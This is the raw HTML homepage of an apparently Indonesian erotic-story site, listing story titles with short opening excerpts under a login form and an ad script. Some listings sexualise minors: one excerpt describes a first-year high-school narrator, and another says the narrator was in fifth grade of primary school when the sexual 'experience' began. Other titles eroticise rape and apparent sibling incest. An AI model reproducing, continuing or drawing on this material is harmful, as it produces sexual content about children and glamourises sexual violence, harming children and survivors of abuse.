<a class="topbar-sign-in " data-toggle="modal" data-target="#bsLoginModal"> <i class="fa fa-user-circle"></i> Sign in </a> <div class="modal sign-in-modal fade" id="bsLoginModal" tabindex="-1" role="dialog" style="display: none"> <div class="modal-dialog" role="document"> <div class="modal-content"> <span class="close-modal" data-dismiss="modal" aria-label="Close"><i class="fa fa-close"></i></span> <div class="modal-body"> <div class="bs-shortcode bs-login-shortcode "> <div class="bs-login bs-type-login" style="display:none"> <div class="bs-login-panel bs-login-sign-panel bs-current-login-panel"> <form name="loginform" action="https://doephotog.com/wp-login.php" method="post"> <div class="login-header"> <span class="login-icon fa fa-user-circle main-color"></span> <p>Welcome, Login to your account.</p> </div> <div class="login-field login-username"> <input type="text" name="log" id="user_login" class="input" value="" size="20" placeholder="Username or Email..." required/> </div> <div class="login-field login-password"> <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" placeholder="Password..." required/> </div> <div class="login-field"> <a href="https://doephotog.com/wp-login.php?action=lostpassword&redirect_to=https%3A%2F%2Fdoephotog.com%2F" class="go-reset-panel">Forget password?</a> <span class="login-remember"> <input class="remember-checkbox" name="rememberme" type="checkbox" id="rememberme" value="forever" /> <label class="remember-label">Remember me</label> </span> </div> <div class="login-field login-submit"> <input type="submit" name="wp-submit" class="button-primary login-btn" value="Log In"/> <input type="hidden" name="redirect_to" value="https://doephotog.com/"/> </div> </form> </div> <div class="bs-login-panel bs-login-reset-panel"> <span class="go-login-panel"><i class="fa fa-angle-left"></i> Sign in</span> <div class="bs-login-reset-panel-inner"> <div class="login-header"> <span class="login-icon fa fa-support"></span> <p>Recover your password.</p> <p>A password will be e-mailed to you.</p> </div> <form name="lostpasswordform" id="lostpasswordform" action="https://doephotog.com/wp-login.php?action=lostpassword" method="post"> <div class="login-field reset-username"> <input type="text" name="user_login" class="input" value="" placeholder="Username or Email..." required/> </div> <div class="login-field reset-submit"> <input type="hidden" name="redirect_to" value=""/> <input type="submit" name="wp-submit" class="login-btn" value="Send My Password"/> </div> </form> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="section-menu"> <div id="menu-top" class="menu top-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <nav class="top-menu-container"> <ul id="top-navigation" class="top-menu menu clearfix bsm-pure"> <li id="topbar-date" class="menu-item menu-item-date"> <span class="topbar-date">Thursday, May 16, 2019</span> </li> <li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent better-anim-fade menu-item-33"><a href="https://doephotog.com/blog/">Blog</a></li> <li id="menu-item-32" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-32"><a href="https://doephotog.com/about-2/">About</a></li> <li id="menu-item-34" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-34"><a href="https://doephotog.com/about/">Contact Us</a></li> <li id="menu-item-35" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-35"><a href="https://doephotog.com/privacy-policy/">Privacy</a></li> <li id="menu-item-44" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-44"><a href="https://doephotog.com/tos/">TOS</a></li> </ul> </nav> </div> </div> </div> </div> </div> </section> <div class="header-inner"> <div class="content-wrap"> <div class="container"> <div class="row"> <div class="row-height"> <div class="logo-col col-xs-4"> <div class="col-inside"> <div id="site-branding" class="site-branding"> <h1 id="site-title" class="logo h1 text-logo"> <a href="https://doephotog.com/" itemprop="url" rel="home"> Cerita Dewasa </a> </h1> </div><!-- .site-branding --> </div> </div> <div class="sidebar-col col-xs-8"> <div class="col-inside"> <aside id="sidebar" class="sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar"> <div class="bsac bsac-clearfix adloc-is-banner adloc-show-desktop adloc-show-tablet-portrait adloc-show-tablet-landscape adloc-show-phone location-header_aside_logo bsac-align-center bsac-column-1"><div id="bsac-607-1958395081" class="bsac-container bsac-type-custom_code " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="607" data-type="custom_code"><script type="text/javascript"> var ad_idzone = "3269648", ad_width = "728", ad_height = "90"; </script> <script type="text/javascript" src="https://ads.exosrv.com/ads.js"></script> <noscript><iframe src="https://syndication.exosrv.com/ads-iframe-display.php?idzone=3269648&output=noscript&type=728x90" width="728" height="90" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe></noscript></div></div> </aside> </div> </div> </div> </div> </div> </div> </div> <div id="menu-main" class="menu main-menu-wrapper show-search-item menu-actions-btn-width-1" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement"> <div class="main-menu-inner"> <div class="content-wrap"> <div class="container"> <nav class="main-menu-container"> <ul id="main-navigation" class="main-menu menu bsm-pure clearfix"> <li id="menu-item-472" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home better-anim-fade menu-item-472"><a href="https://doephotog.com/">Home</a></li> </ul><!-- #main-navigation --> <div class="menu-action-buttons width-1"> <div class="search-container close"> <span class="search-handler"><i class="fa fa-search"></i></span> <div class="search-box clearfix"> <form role="search" method="get" class="search-form clearfix" action="https://doephotog.com"> <input type="search" class="search-field" placeholder="Search..." value="" name="s" title="Search for:" autocomplete="off"> <input type="submit" class="search-submit" value="Search"> </form><!-- .search-form --> </div> </div> </div> </nav><!-- .main-menu-container --> </div> </div> </div> </div><!-- .menu --> </header><!-- .header --> <div class="rh-header clearfix dark deferred-block-exclude"> <div class="rh-container clearfix"> <div class="menu-container close"> <span class="menu-handler"><span class="lines"></span></span> </div><!-- .menu-container --> <div class="logo-container rh-text-logo"> <a href="https://doephotog.com/" itemprop="url" rel="home"> Cerita Dewasa </a> </div><!-- .logo-container --> </div><!-- .rh-container --> </div><!-- .rh-header --> <div class="content-wrap"> <main id="content" class="content-container"> <div class="container layout-2-col layout-2-col-1 layout-right-sidebar"> <div class="row main-section"> <div class="col-sm-8 content-column"> <div class="slider-container clearfix slider-type-custom-blocks slider-style-10-container slider-overlay-simple-gr"> <div class="bs-shortcode bs-slider bs-slider-1 clearfix slider-overlay-simple-gr"> <div class="better-slider" id="slider-1349580229" data-slideshowSpeed="7000" data-animation="slide" data-controlNav="" data-animationSpeed="600"> <ul class="slides"> <li class="slide bs-slider-item bs-slider-1-item main-term-4 has-post-thumbnail"> <div class="item-content"> <a class="img-cont" href="https://doephotog.com/cerita-sex-goyangan-maut-tante-dona-sangat-dasyat/" style="background-image: url('https://doephotog.com/wp-content/uploads/2019/02/CeritaSex102-640x580.jpg')"></a> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <div class="content-container"> <h3 class="title"> <a class="post-url post-title" href="https://doephotog.com/cerita-sex-goyangan-maut-tante-dona-sangat-dasyat/"> Cerita Sex Goyangan Maut Tante Dona Sangat Dasyat </a> </h3> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-15T05:56:24+00:00">May 15, 2019</time></span> <span class="share rank-default"><i class="bf-icon fa fa-share-alt"></i> 0</span> <a href="https://doephotog.com/cerita-sex-goyangan-maut-tante-dona-sangat-dasyat/#respond" title="Leave a comment on: &ldquo;Cerita Sex Goyangan Maut Tante Dona Sangat Dasyat&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> </div> </div> </li> <li class="slide bs-slider-item bs-slider-1-item main-term-4 has-post-thumbnail"> <div class="item-content"> <a class="img-cont" href="https://doephotog.com/cerita-sex-cerita-istri-ml-dadakan-dengan-pegawai-pln/" style="background-image: url('https://doephotog.com/wp-content/uploads/2019/02/CeritaSex083-600x580.jpg')"></a> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <div class="content-container"> <h3 class="title"> <a class="post-url post-title" href="https://doephotog.com/cerita-sex-cerita-istri-ml-dadakan-dengan-pegawai-pln/"> Cerita Sex Cerita Istri ML Dadakan Dengan Pegawai PLN </a> </h3> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-12T16:50:55+00:00">May 12, 2019</time></span> <span class="share rank-default"><i class="bf-icon fa fa-share-alt"></i> 0</span> <a href="https://doephotog.com/cerita-sex-cerita-istri-ml-dadakan-dengan-pegawai-pln/#respond" title="Leave a comment on: &ldquo;Cerita Sex Cerita Istri ML Dadakan Dengan Pegawai PLN&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> </div> </div> </li> <li class="slide bs-slider-item bs-slider-1-item main-term-4 has-post-thumbnail"> <div class="item-content"> <a class="img-cont" href="https://doephotog.com/cerita-sex-cerita-dewasa-bergambar-meki-legit-perawan-berjilbab/" style="background-image: url('https://doephotog.com/wp-content/uploads/2019/02/CeritaSex017.jpg')"></a> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <div class="content-container"> <h3 class="title"> <a class="post-url post-title" href="https://doephotog.com/cerita-sex-cerita-dewasa-bergambar-meki-legit-perawan-berjilbab/"> Cerita Sex Cerita Dewasa Bergambar Meki Legit Perawan Berjilbab </a> </h3> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-12T08:37:10+00:00">May 12, 2019</time></span> <span class="share rank-default"><i class="bf-icon fa fa-share-alt"></i> 0</span> <a href="https://doephotog.com/cerita-sex-cerita-dewasa-bergambar-meki-legit-perawan-berjilbab/#respond" title="Leave a comment on: &ldquo;Cerita Sex Cerita Dewasa Bergambar Meki Legit Perawan Berjilbab&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> </div> </div> </li> </ul> </div> </div> </div> <div class="listing listing-tall listing-tall-2 clearfix columns-4 columns-1"> <article class="post-890 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Cerita Porno Hot Memek Eva Berdenyut" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex024-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex024-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex024-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex024-368x445.jpg&quot;,&quot;867&quot;:&quot;CeritaSex024.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/" class="post-title post-url"> Cerita Sex Cerita Porno Hot Memek Eva Berdenyut </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-12T00:49:16+00:00">May 12, 2019</time></span> <a href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/#respond" title="Leave a comment on: &ldquo;Cerita Sex Cerita Porno Hot Memek Eva Berdenyut&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Namaku Eva, seoarang wanita keturunan, usiaku 27 tahun dan aku sudah mempunyai seorang anak dari suami yg&hellip; </div> </div> </article > <article class="post-1173 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Sex Sempitnya Memek Perawan Reni" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex054-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex054-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex054-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex054-368x445.jpg&quot;,&quot;743&quot;:&quot;CeritaSex054.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-sex-sempitnya-memek-perawan-reni/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-sex-sempitnya-memek-perawan-reni/" class="post-title post-url"> Cerita Sex Sex Sempitnya Memek Perawan Reni </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-10T16:28:46+00:00">May 10, 2019</time></span> <a href="https://doephotog.com/cerita-sex-sex-sempitnya-memek-perawan-reni/#respond" title="Leave a comment on: &ldquo;Cerita Sex Sex Sempitnya Memek Perawan Reni&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Sebenarnya aku masih kelas 1 SMA tapi di sini aku mempunyai cerita dewasa yang ingin aku bagi. Namaku Putra di&hellip; </div> </div> </article > <article class="post-1413 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Cerita Dewasa Ngentot Janda Cantik Di Bioskop" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex101-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex101-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex101-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex101-368x445.jpg&quot;,&quot;720&quot;:&quot;CeritaSex101.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-cerita-dewasa-ngentot-janda-cantik-di-bioskop/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-cerita-dewasa-ngentot-janda-cantik-di-bioskop/" class="post-title post-url"> Cerita Sex Cerita Dewasa Ngentot Janda Cantik Di Bioskop </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-10T16:25:35+00:00">May 10, 2019</time></span> <a href="https://doephotog.com/cerita-sex-cerita-dewasa-ngentot-janda-cantik-di-bioskop/#respond" title="Leave a comment on: &ldquo;Cerita Sex Cerita Dewasa Ngentot Janda Cantik Di Bioskop&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Simak kisah cerita dewasa ngentot janda cantik di bioskop paling seru pokonya berikut Awal aku mengenalnya pada&hellip; </div> </div> </article > <article class="post-1207 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Pengalaman Pertama ku Threesome" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex041-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex041-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex041-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex041-368x445.jpg&quot;,&quot;640&quot;:&quot;CeritaSex041.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-pengalaman-pertama-ku-threesome/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-pengalaman-pertama-ku-threesome/" class="post-title post-url"> Cerita Sex Pengalaman Pertama ku Threesome </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-10T03:46:03+00:00">May 10, 2019</time></span> <a href="https://doephotog.com/cerita-sex-pengalaman-pertama-ku-threesome/#respond" title="Leave a comment on: &ldquo;Cerita Sex Pengalaman Pertama ku Threesome&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Ini bermula ketika aku ada janji dengan temanku bernama Irfan (samaran) untuk membicarakan suatu organisasi.&hellip; </div> </div> </article > <article class="post-1365 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Di Kapal Bersama Cindy" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex063-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex063-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex063-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex063-368x445.jpg&quot;,&quot;540&quot;:&quot;CeritaSex063.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-di-kapal-bersama-cindy/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-di-kapal-bersama-cindy/" class="post-title post-url"> Cerita Sex Di Kapal Bersama Cindy </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-09T23:24:03+00:00">May 9, 2019</time></span> <a href="https://doephotog.com/cerita-sex-di-kapal-bersama-cindy/#respond" title="Leave a comment on: &ldquo;Cerita Sex Di Kapal Bersama Cindy&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Boleh di bilang aku adalah laki-laki yang beruntung. karena terus terang saja aku tak memiliki penampilan fisik&hellip; </div> </div> </article > <article class="post-1124 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Waktu Kecil diperalat Memuaskan Birahi mbak Yuli" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex019-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex019-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex019-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex019-368x445.jpg&quot;,&quot;600&quot;:&quot;CeritaSex019.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-waktu-kecil-diperalat-memuaskan-birahi-mbak-yuli/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-waktu-kecil-diperalat-memuaskan-birahi-mbak-yuli/" class="post-title post-url"> Cerita Sex Waktu Kecil diperalat Memuaskan Birahi mbak&hellip; </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-09T14:33:41+00:00">May 9, 2019</time></span> <a href="https://doephotog.com/cerita-sex-waktu-kecil-diperalat-memuaskan-birahi-mbak-yuli/#respond" title="Leave a comment on: &ldquo;Cerita Sex Waktu Kecil diperalat Memuaskan Birahi mbak Yuli&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Pengalaman sex yang tak pernah saya lupa dalam hidupku, saat itu saya masih kelas SD tepatnya kelas 5 , baru&hellip; </div> </div> </article > <article class="post-971 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Di Balik Jilbab Nurjanah &#038; Temannya" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex073-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex073-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex073-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex073-368x445.jpg&quot;,&quot;592&quot;:&quot;CeritaSex073.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-di-balik-jilbab-nurjanah-temannya/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-di-balik-jilbab-nurjanah-temannya/" class="post-title post-url"> Cerita Sex Di Balik Jilbab Nurjanah &#038; Temannya </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-09T09:20:13+00:00">May 9, 2019</time></span> <a href="https://doephotog.com/cerita-sex-di-balik-jilbab-nurjanah-temannya/#respond" title="Leave a comment on: &ldquo;Cerita Sex Di Balik Jilbab Nurjanah &#038; Temannya&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Namaku adalah Farid, bekerja di perusahaan konsultan IT yang cukup ternama di tanah air. Posisiku sebagai&hellip; </div> </div> </article > <article class="post-1003 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Aku Dan Kakakku" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex028-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex028-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex028-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex028-368x445.jpg&quot;,&quot;640&quot;:&quot;CeritaSex028.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-aku-dan-kakakku/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-aku-dan-kakakku/" class="post-title post-url"> Cerita Sex Aku Dan Kakakku </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-09T08:00:14+00:00">May 9, 2019</time></span> <a href="https://doephotog.com/cerita-sex-aku-dan-kakakku/#respond" title="Leave a comment on: &ldquo;Cerita Sex Aku Dan Kakakku&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Ini mungkin sebuah pengalaman yang paling gila (menurutku), karena orang pertama yang mengajarkan seks kepadaku&hellip; </div> </div> </article > <article class="post-954 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Aku Di Perkosa Tukang Sampah" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex056-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex056-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex056-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex056-368x445.jpg&quot;,&quot;480&quot;:&quot;CeritaSex056.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-aku-di-perkosa-tukang-sampah/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-aku-di-perkosa-tukang-sampah/" class="post-title post-url"> Cerita Sex Aku Di Perkosa Tukang Sampah </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-08T21:34:50+00:00">May 8, 2019</time></span> <a href="https://doephotog.com/cerita-sex-aku-di-perkosa-tukang-sampah/#respond" title="Leave a comment on: &ldquo;Cerita Sex Aku Di Perkosa Tukang Sampah&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Suatu hari aku bangun pagi sekali, hari itu aku kuliah siang jam sebelas sementara jam di kamarku masih&hellip; </div> </div> </article > <article class="post-1009 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Paling Hot Di Kota Manado" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex034-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex034-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex034-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex034-368x445.jpg&quot;,&quot;480&quot;:&quot;CeritaSex034.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-paling-hot-di-kota-manado/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-paling-hot-di-kota-manado/" class="post-title post-url"> Cerita Sex Paling Hot Di Kota Manado </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-08T18:29:46+00:00">May 8, 2019</time></span> <a href="https://doephotog.com/cerita-sex-paling-hot-di-kota-manado/#respond" title="Leave a comment on: &ldquo;Cerita Sex Paling Hot Di Kota Manado&rdquo;" class="comments"><i class="fa fa-comments-o"></i> 0</a> </div> <div class="post-summary"> Pada pukul 15:00, acara Pramuka dibubarkan. Kamipun segera bergegas meninggalkan tempat tersebut. Aku setelah&hellip; </div> </div> </article > <article class="post-1576 type-post format-standard has-post-thumbnail listing-item listing-item-tall listing-item-tall-2 main-term-4"> <div class="item-inner clearfix"> <div class="featured clearfix"> <div class="term-badges floated"><span class="term-badge term-4"><a href="https://doephotog.com/category/cerita-sex-selingkuh/">Cerita Sex Selingkuh</a></span></div> <a title="Cerita Sex Atasanku Yang Biasa Berwibawa Dikantor, Kini Mendesah Dibawah Selangkanganku" data-src="https://doephotog.com/wp-content/uploads/2019/02/CeritaSex016-368x445.jpg" data-bs-srcset="{&quot;baseurl&quot;:&quot;https:\/\/doephotog.com\/wp-content\/uploads\/2019\/02\/&quot;,&quot;sizes&quot;:{&quot;180&quot;:&quot;CeritaSex016-180x217.jpg&quot;,&quot;267&quot;:&quot;CeritaSex016-267x322.jpg&quot;,&quot;368&quot;:&quot;CeritaSex016-368x445.jpg&quot;,&quot;640&quot;:&quot;CeritaSex016.jpg&quot;}}" class="img-holder" href="https://doephotog.com/cerita-sex-atasanku-yang-biasa-berwibawa-dikantor-kini-mendesah-dibawah-selangkanganku/"></a> </div> <h2 class="title"> <a href="https://doephotog.com/cerita-sex-atasanku-yang-biasa-berwibawa-dikantor-kini-mendesah-dibawah-selangkanganku/" class="post-title post-url"> Cerita Sex Atasanku Yang Biasa Berwibawa Dikantor, Kini&hellip; </a> </h2> <div class="post-meta"> <a href="https://doephotog.com/author/gukubiquitous/" title="Browse Author Articles" class="post-author-a"> <i class="post-author author"> gukubiquitous </i> </a> <span class="time"><time class="post-published updated" datetime="2019-05-08T12:19:44+00:00">May 8, 2019</time></span> <a 